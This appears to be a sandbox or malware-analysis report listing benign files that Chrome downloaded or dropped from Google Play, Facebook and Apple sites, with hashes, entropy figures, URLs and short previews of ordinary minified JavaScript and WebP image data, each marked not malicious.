                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):346530
                                                                                                                                                                                                                                  Entropy (8bit):7.987918693945807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:hMciSfjrhhuG6jyErl8NxZfwoBBqjRSVAuUqQfHoTYjGfo8+VFNJDqf78623:hhfxhudjHl8N7Ic2UeqQhGyrv6Y
                                                                                                                                                                                                                                  MD5:8D0C6C0AF04F75202D50CA150B42546E
                                                                                                                                                                                                                                  SHA1:600F8D39B0104237772F939499467E7836210421
                                                                                                                                                                                                                                  SHA-256:FC46AE746F124797BCEAB8E353C334477C2695FC2B4E1217719444BD86E6DB89
                                                                                                                                                                                                                                  SHA-512:E00DB5815E83F0E3D75F4F08D729120FDB352F85CA045B52E0F08439722A16EAEBE41C38A5AE3C94D01B5BD7E327E899FE3FC0AC23110F0BFC4FCFF6962DD89A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/bgcPzHXeNLE4GaoU2M7V0umCe6uxHpBzg8h9TfLUV3tVFjHsjJdL2aGz4cTRk1G5vswo=w648-h364-rw
                                                                                                                                                                                                                                  Preview:RIFF.I..WEBPVP8L.I../..Z..@l$9l..'..W.`JI........t......&..T.c...*r#.~..='.)..O..D.U.L.e8.H|....x>..<o..(e...-O...... IT. ..F..O^}AD...y.dWF$_%(..!..#..'j.?c.vW..w.I..J.s..q.9.+..o.3A.S}L..d{..{. ...|=.d.....[.*B'.tcU.3ws.f.(S.0..1*m..._.B......}?&&Iww.W..L@..e..yU...Y.X....1YIn.D..b...D.\...0..sr..G...3.[d.>6...wq.nat+...c..W..60.>.f`.%.z.....e.g|..Z.W..%....m..B.#.1"=9.....{..]1._.3.a..f.f...9.".^.e...P*.4.....|..^......3.=.l..*Ro......t1. .yn%....|...m...>H.3/.......oO..t0pcL..`..}..#...56.....h....,\I.E..v....{+...}....WB..........6H..wk......~.(1%k2.aW.......E.....?^..Y..P..s}...&..RIf6...7C..L6.[....j.9..R.l........x..Q....-.........e.....d.y..]xL..>..C...V..1...H...mw7.y/..>.9K=K.b.......Y.2o.}....iK.....zM...J.....C..GR!.ld.a.=F.....4d......zM....x.t5...SX.L....d.d....U.....|.I.x...n/uK.x...|.).C.....E)...tE.XI.p..GZ.-O&..N.=.+.....,e..jy...U..os.9/k.o..y+y.zy....5.....T.E.....1...vL.N9...cH.L..#.R+U.^.jY{.e....-.>.f...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1881)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):42032
                                                                                                                                                                                                                                  Entropy (8bit):5.436259422203893
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:TBKiTA/pZGZJmpQbAFSSCN5VoEmp8oQDt+U9JU7vvc/sl0ov09MCDTVMrhvUVsbN:aTGZgCNDv+eUlsDTYhvYQ/gCqehTPUgV
                                                                                                                                                                                                                                  MD5:6A62C13FDFCB467B2953F9CCEDCCF523
                                                                                                                                                                                                                                  SHA1:D5CCD0646CEB76A56954BE1016FD1EB65E17D10F
                                                                                                                                                                                                                                  SHA-256:6AF490BACF55B2D6858CA35B3F40E659E49E320D715BE00E669ED6371F6FC00A
                                                                                                                                                                                                                                  SHA-512:610FB3519E13CDC8DE5EDEA21604BD112CE6E962566514174DA046D6FA12705292D1F2C91539EF177F66FC1CE9C9FCAB1AE0989852775994C037CBA27BB24628
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.Hqa=function(a){let b=0;for(const c in a)b++;return b};_.Iqa=function(a,b){for(const c in a)if(a[c]==b)return!0;return!1};_.Jqa=function(a){return a.Kh&&typeof a.Kh=="function"?a.Kh():_.da(a)||typeof a==="string"?a.length:_.Hqa(a)};._.Sn=function(a){if(a.Ci&&typeof a.Ci=="function")return a.Ci();if(typeof Map!=="undefined"&&a instanceof Map||typeof Set!=="undefined"&&a instanceof Set)return Array.from(a.values());if(typeof a==="string")return a.split("");if(_.da(a)){for(var b=[],c=a.length,d=0;d<c;d++)b.push(a[d]);return b}return _.Va(a)};._.Kqa=function(a){if(a.tn&&typeof a.tn=="function")return a.tn();if(!a.Ci||typeof a.Ci!="function"){if(typeof Map!=="undefined"&&a instanceof Map)return Array.from(a.keys());if(!(typeof Set!=="undefined"&&a instanceof Set)){if(_.da(a)||typeof a==="string"){var b=[];a=a.length;for(var c=0;c<a;c++)b.push(c);return b}return _.Wa(a)}}};.var Lqa,Mqa,Nqa
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10672)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25512
                                                                                                                                                                                                                                  Entropy (8bit):5.5380769875937625
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:E6W9FDn62dhKmyqkXZ0XhnDGZjTVr1nDdU6DQGMq9wHAY:6FDn6HPZSahBvDQGMq8f
                                                                                                                                                                                                                                  MD5:2F4D956ECEAB1D26E4CA599AFA43C5AB
                                                                                                                                                                                                                                  SHA1:162DA72F1DAA41895100BC9D27690211C1B10637
                                                                                                                                                                                                                                  SHA-256:2B4E3CBEB334AC5E6ED008EAE87AD245E74C4F4DB1C3BCC0BE192D421E228B03
                                                                                                                                                                                                                                  SHA-512:DFE0E85011451E31217F5C5B0EB70C6F054398B90A4C1024364ABECDC60DE02BE7B2A4A98C7569B3E9C0D654D7DEC5E6E4741BBE99BE868005B21423B8E84246
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("color-name-1.1.3",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){g.exports={aliceblue:[240,248,255],antiquewhite:[250,235,215],aqua:[0,255,255],aquamarine:[127,255,212],azure:[240,255,255],beige:[245,245,220],bisque:[255,228,196],black:[0,0,0],blanchedalmond:[255,235,205],blue:[0,0,255],blueviolet:[138,43,226],brown:[165,42,42],burlywood:[222,184,135],cadetblue:[95,158,160],chartreuse:[127,255,0],chocolate:[210,105,30],coral:[255,127,80],cornflowerblue:[100,149,237],cornsilk:[255,248,220],crimson:[220,20,60],cyan:[0,255,255],darkblue:[0,0,139],darkcyan:[0,139,139],darkgoldenrod:[184,134,11],darkgray:[169,169,169],darkgreen:[0,100,0],darkgrey:[169,169,169],darkkhaki:[189,183,107],darkmagenta:[139,0,139],darkolivegreen:[85,107,47],darkorange:[255,140,0],darkorchid:[153,50,204],darkred:[139,0,0],darksalmon:[233,150,122],darkseagreen:[143,188,143],darkslateblue:[72,61
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9961)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):49381
                                                                                                                                                                                                                                  Entropy (8bit):5.4893612792245285
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:JCrcX8WlQPwSgYPxSORD9S28tltgpAS3mjyV+ElS:0rcCPwSgYPxSORD9SDipAS2zEs
                                                                                                                                                                                                                                  MD5:B0CE4498F3924CD09A1BB1C7BE14E311
                                                                                                                                                                                                                                  SHA1:D6C702D3832D75D2FA6ED0FE02AE867A15D05134
                                                                                                                                                                                                                                  SHA-256:662991BD2C2DEFEE27D0F01C27295BF675C3080E43D94AE35A5E6E50C6A48324
                                                                                                                                                                                                                                  SHA-512:30DCB09798DF3EA2E4BE593C7F8DAABE614043FA8212EC0EEFF4820CD8A01F0BE6BDDE20536FBC6D6027B9EB80BA7998235D9E9D938DC8E744C7E5FE9080B26A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:(i++).toString(36)}),this.$3=[]}var c=a.prototype;c.getID=function(){return this.$2.id};c.begin=function(){this.$2.begin=b("cr:9985")();return this};c.end=function(){this.$2.end=b("cr:9985")();return this};c.appendChild=function(){var a=this;this.$1&&h(0,37302,this.$2.description);for(var b=arguments.length,c=new Array(b),d=0;d<b;d++)c[d]=arguments[d];c.forEach(function(b){a.$3.push(b.getID())});return this};c.setPosted=function(){this.$1=!0;return this};c.getPostData=function(){return babelHelpers["extends"]({},this.$2,{id:this.$2.id,children:this.$3.slice()})};return a}();g["default"]=a}),98);.__d("ArtillerySequence",["invariant"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"description"in a||h(0,1497,
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8243)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10408
                                                                                                                                                                                                                                  Entropy (8bit):5.228704012543909
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:eZH7kUk70Eb1QAUf8HYTevU1gST4wLxr2:eRkR96ApHY2STr2
                                                                                                                                                                                                                                  MD5:74F18E69FCEEB4513B9F24322BE7386E
                                                                                                                                                                                                                                  SHA1:FE37CB92776F387DB632472296B0ADDEB815DD55
                                                                                                                                                                                                                                  SHA-256:E3FDF2DDBE34D56ED6DB667544576B0821399F47124E09DC9671DD62CFD1DD28
                                                                                                                                                                                                                                  SHA-512:7FAE4FBD35068C64252A7645D66FF19CFAF6FE02302A11070E503B315F58D12D48055A59DC72E7970E2FE0435D5095B6DE7FD61FA8C8DCCA07EC4DC376876B2D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yK/r/lNInKxOqejp.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/V9vdYColc4k/. */.__d("react-0.0.0",["React"],(function(a,b,c,d,e,f){"use strict";function a(a){return a&&typeof a==="object"&&"default"in a?a["default"]:a}var g=a(b("React"));d={};var h={exports:d};function i(){h.exports=g}var j=!1;function k(){j||(j=!0,i());return h.exports}function c(a){switch(a){case void 0:return k()}}e.exports=c}),null);.__d("react",["react-0.0.0"],(function(a,b,c,d,e,f){e.exports=b("react-0.0.0")()}),null);./**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("resize-observer-polyfill-1.5.1",[],(function(a,b,c,d,e,f){"use strict";var g={},h={exports:g};function i(){(function(b,c){typeof g==="object"&&typeof h!=="undefined"?h.exports=c():b.ResizeObserver=c()})(this,function(){var b=function(){if(typeof Map!=="undefined")return Map;function a(a,b){var c=-1;a.some(function(d,a){if(d[0]===b){c=a;return!0}return!1});return c}return function(){function b(){this.__entries__=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (381)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):925
                                                                                                                                                                                                                                  Entropy (8bit):5.223022542169909
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:u6oTTlrIYevhTuKtLG0MAWB6QeJRFrnDXvjV:upnlrpevhTuAG9AWWRFDDXvjV
                                                                                                                                                                                                                                  MD5:E19C18502A12FDADA7F86888071328EA
                                                                                                                                                                                                                                  SHA1:02203C7A7AA0B3FEFD4EC5179C5C1E6B6784B0C8
                                                                                                                                                                                                                                  SHA-256:7AC6A1D9656FE05495E01D58E9C5823473A46347F9A7A23770915C1DD32E4CC1
                                                                                                                                                                                                                                  SHA-512:4BEABBE238270C0ECB7C09310B143647D0B21D465059ED9FD63FFD27D5EEC80EEA23D4C1EC095E5665230C87479206D234817C83F44CBBB864B684E5043CB0CA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const r=/([bptsq]){1}:(rgb\([\d,]+)\)/g,t={b:"backgroundColor",p:"primaryTextColor",s:"secondaryTextColor",t:"tertiaryTextColor",q:"quaternaryTextColor"};function o(o){if("string"!=typeof o)return{};const e=o.match(r);return e?e.map((r=>r.split(":"))).reduce(((r,o)=>{const[e,n]=o;r[t[e]]=n;const s=n.substring(4,n.length-1);return r[`${t[e]}RGBValues`]=s,r}),{}):{}}export{o as j}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10356
                                                                                                                                                                                                                                  Entropy (8bit):7.97345226089636
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:xMbrvPy5pPsGNhEK5XrjDFoNNBg0WVdDebc3S9LjYvFQkpNxXPzabcJ2W4oz:x8va5pPsGz15XrjENBg08dQc3S9LoNFh
                                                                                                                                                                                                                                  MD5:D4A18595328B1DE8209C845F4584EC65
                                                                                                                                                                                                                                  SHA1:BDA2404D091B7C92F2B06222985D8D805BCB4CA9
                                                                                                                                                                                                                                  SHA-256:09FD1ABAD6CD8C4E81D4B6D7C544FBA7983A5F05D86D692DBA83DFF101F9C451
                                                                                                                                                                                                                                  SHA-512:CAE18B974CF53F7D2EEB81635886FF5597DC7FC81F961E199E699F69A3FBEB427333940ACE2FD42DC240B986BCE32CBA981F1C4CB64128BDF5531F2724FC999A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFl(..WEBPVP8X........?..?..VP8L$(../?...M(l....pR........j..r.'..8....%".VC.V....H..,...GE.......q.F.t9.r.Wu.|73.k..m...u:.....t?.@..g...&.a.....yY2.X.S._(...}.. .ycb. ... 3P^.x6cV./|.A.......(B^.Ul..sm.6...b...oqiQ][....e'|).__".....%`.3r.r(c(h.Fr....a...@...}..m[.}.....4CNI....h..|z....?$..6..Kv.t.q....4..3..233c..$.m7L.yO.mr....%3d..r......8.h.c.h.$m..Mj..5N-/.6o.6N.>......,...f.I'..........h......q<.&.8..:6.-.S.O..m....m.m..x.).m.d2.L........-o.m.q.x].$[.D..a..................\.w.....I...8..En.0...O<|....Y..o=.W..O.L[...7.....e.....I...by..U.(..w~.1<.Q..LAQ..]q......J. .H...[...+.2.....n"..I....... .... .B.BSLp,.:...Z..Nk..&...Z...0....+..@..F....@..p....>v...{.....R.K.L....,..n.M...v.".K$..ov.p......?.'.n..;4s*.5Q...%d.z...LzV..%&... A..1:Hl.*.A.`Z]......+t+.SLB+X .....F....~.aG{.c..w...es.E...~.m]..l.&..c....~.)~.bS..Im...A.G1a...q .1b....J.a7...^.......x.Z....;z]..>.@.......k.>...`..5j...). ...W..8'..#h.v.N.....<]gP...Y}E..w..P..S.k...%>..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):337
                                                                                                                                                                                                                                  Entropy (8bit):5.19051977235009
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnuZWofEOAuGNG/QVIphitHe9ke1MwQRaNw6JpyxZRNlad0:kRZTFuUdI/AIDitH+FRkbRN20
                                                                                                                                                                                                                                  MD5:A3EFC6C3C1E10AB6A34A6CD8CF9B96FD
                                                                                                                                                                                                                                  SHA1:25B927B3C2929A8697854C4412619505E841BD72
                                                                                                                                                                                                                                  SHA-256:1459223C60C683FFF0FB2B48FB48FAD7F09A0E1D0857BE05364F4DC01DD75D1D
                                                                                                                                                                                                                                  SHA-512:A5788E40C020D99638536F52E799DC6F0AC9FA099ABB03B0A0D3F1F06E7AF76D3BF02C8649A92428FF373C1641783B5176340D983075524031E0DB18A944F50B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("kpVlPe");._.qr(_.NBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"kpVlPe"}N(){return!0}Xa(){return _.s6}});_.$q.kpVlPe=_.jA;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):52916
                                                                                                                                                                                                                                  Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                  MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                  SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                  SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                  SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 526x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44186
                                                                                                                                                                                                                                  Entropy (8bit):7.9957393921993045
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:4PSx3okLo1GwbzY8Me9Co0hDMG/ztToefE7/6ca0bkMs/BFC:4Pk4FTbX30h7dFmSIkMe8
                                                                                                                                                                                                                                  MD5:9E9F2E2752A93831B4F40EE079EA554F
                                                                                                                                                                                                                                  SHA1:D166D1D70635A2253541495ADBA0F8B53A59D00C
                                                                                                                                                                                                                                  SHA-256:FF0194F7EA712A1E4BE2C9BF0FB391740083A8E59F77DAE003FAF6FAC2B988A6
                                                                                                                                                                                                                                  SHA-512:B52262584AA05C110C7046A77916B02DF6ACEBA4C50527DECA391607E709F5B7181FE9952409E50417AD5E61D5D51D289C2234721FA843770AB5BBF02C6C6A5B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ....P....*..(.>q*.E..!.L..H....E..X/A.o......~.....=......h........I...............?...O.?._..._.~.?....!.{.../.....x..=@.......k......7.g...g...O.....?v>..j.........}.....G.........._3...#........W.?.=.........y.......?...~g...[...../a_.....?...{..a.....?....3.....?.~....G....o.`?........).........x.~.._...../.....~..~.....w....>.........+.......?....K......./q._....a..~...c.~.PUU.X...Ak(....ol..DS.a..1..0..P...V..H.Hh..$i.4hN,.....>.ovp.....iU0."9...........n.$..n..w.IM._a.............Y|.`........G'...?........6......%b!....T......0..R.....'..C.-3b.)..E..8~>.[.-/....(.=0".p.....!:....).RJ.#MA0F{{.....&.- n.M...E........[.:...m<..4..t.....p...&..T.`..e..@Q~..../...Z...... o.n1B.G...f.{..BS3r+ew....g]..J|.v-[..z.uU..")O#|.{..}[...kC..da}Bs.../....|....._.!.X........}B.f04..#.1....@Q.........>..w.^..T.D*.-t.......>.%o...t:.r.............'m...<.xO.Y..N...D.....}.D.`g.....u.O..a...5u.....d(.u.+....E..)..%6.s.E..&P.$...y.G.H;%G..5.."..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3175)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):45694
                                                                                                                                                                                                                                  Entropy (8bit):5.118242929635633
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:tpi7T07ytsSwuLFB3t8KbX3zrcW3HsBtuv3BtlK7vKH5v9u8kEFsW1:tpK1L5bTIByv9u1EFd
                                                                                                                                                                                                                                  MD5:8B2EA74C2950F702116F9B02ABC52BCB
                                                                                                                                                                                                                                  SHA1:AD7455A6E9F0D7E73BA4B80422EF805FC66F7879
                                                                                                                                                                                                                                  SHA-256:FFEA291B7D7F014FDC619350CAC7B5CECF876DD20EFB498EF0D915FE3AC4BA17
                                                                                                                                                                                                                                  SHA-512:942397EE9B53797364C02D073689CD3FC049E2EA7AF9D89F19608A61EBB76DA8A554D124F8BE99CECE74EB540806C9BBC383DAC238448D07A42DFC4D421B89A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.990.023f8bfb4104e9778375.js
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[990],{67990:function(e,t,n){n.r(t),n.d(t,{ClickstreamProcessor:function(){return we}}).var r=n(24178),i=n(32722),o=n(76588),s=function(){}.s.prototype.setDelegate=function(e){return r.SC.attachDelegate(this,e)},s.prototype.localStorageObject=r.tO.localStorageObject,s.prototype.sessionStorageObject=r.tO.sessionStorageObject.var a=function(){this.environment=new s,this.logger=(0,o.RG)("mt-client-constraints")},c={nonEmpty:function(e,t){return!!r.SC.isObject(t)&&t.hasOwnProperty(e)&&r.SC.isDefinedNonNullNonEmpty(t[e])},valueMatches:function(e,t,n){if(!r.SC.isObject(t))return!1.var i=t[e].return t.hasOwnProperty(e)&&n.indexOf(i)>-1}},p="overrideFieldValue",u=function(){}.u.prototype.constrainedValue=function(e,t,n){var r=e&&e.hasOwnProperty(n)?e[n]:null.return this.applyConstraintRules(r,t)},u.prototype.applyConstraintRules=function(e,t){var n=e.return t&&t.blacklisted?n=null:t&&t.hasOwnProp
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (4181)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):24223
                                                                                                                                                                                                                                  Entropy (8bit):5.429094862367194
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:wY4WrsTBXoWi8zyzso+nyQNZF13js4WHidus8XJqFWVzlP9wQ:f4WITB4WB4+/j1c7X4WVzlP99
                                                                                                                                                                                                                                  MD5:4921AD7DB0310614641D131B883C33E5
                                                                                                                                                                                                                                  SHA1:0126DE249CBA43DA8FA067523F4F21A71E5A3422
                                                                                                                                                                                                                                  SHA-256:1F5E1C160B83087F12390614A70918A5518E634A39DB64FE9AF47E4E487A358B
                                                                                                                                                                                                                                  SHA-512:1DEFA4012FE8C722FD76E7AEF8B13D54B45FEFC7A5A25EDC02E210A04957F3C387DC5BFBE99FE2F911DE797497E789FD8C0D0C8ACDE812A7EE7E558BF60224EF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/BTuEBPL3Mnd.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("forEachObject",[],(function(a,b,c,d,e,f){"use strict";var g=Object.prototype.hasOwnProperty;function a(a,b,c){for(var d in a){var e=d;g.call(a,e)&&b.call(c,a[e],e,a)}}f["default"]=a}),66);.__d("BasicVector",[],(function(a,b,c,d,e,f){a=function(){function a(a,b){this.x=a,this.y=b}var b=a.prototype;b.derive=function(b,c){return new a(b,c)};b.toString=function(){return"("+this.x+", "+this.y+")"};b.add=function(a,b){b===void 0&&(b=a.y,a=a.x);a=parseFloat(a);b=parseFloat(b);return this.derive(this.x+a,this.y+b)};b.mul=function(a,b){b===void 0&&(b=a);return this.derive(this.x*a,this.y*b)};b.div=function(a,b){b===void 0&&(b=a);return this.derive(this.x*1/a,this.y*1/b)};b.sub=function(a,b){if(arguments.length===1)return this.add(a.mul(-1));else return this.add(-a,-b)};b.distanceTo=function(a){return this.sub(a).magnitude()};b.magnitude=function(){return Math.sqrt(this.x*this.x+this.y*this.y)};b.rotate=function(a){return this.derive(this.x*Math.cos(a)-this.y*Math.sin(a),
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (551)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):2784
                                                                                                                                                                                                                                  Entropy (8bit):5.629660032195074
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kuoPnqZoTWVzcP9j4g4YuMyuc8bHv0scVkgaWDIgCS4lddyLdsqvNgo4F7q7XVPl:kuoPnqjt8bHvRLr2I17IjvNpRFnl
                                                                                                                                                                                                                                  MD5:0B77B2491EAC06A5DEE4B34CD3725D36
                                                                                                                                                                                                                                  SHA1:B2A77E5866D8BEF17DAD3EEF3CD0CC51B0E082A1
                                                                                                                                                                                                                                  SHA-256:95A510F000B7F8A863FDC71B353E625F586924A0135FA0599E0B6DFD54582EEC
                                                                                                                                                                                                                                  SHA-512:3C8AB119E12342514E64CA2A36858481649E463BA513ECCAF0073B9836D134ECE2F49A17AA581DCEF5547E83C38CE6F6EA422E5D457017A3DF2E6C6CAB8BFC79
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
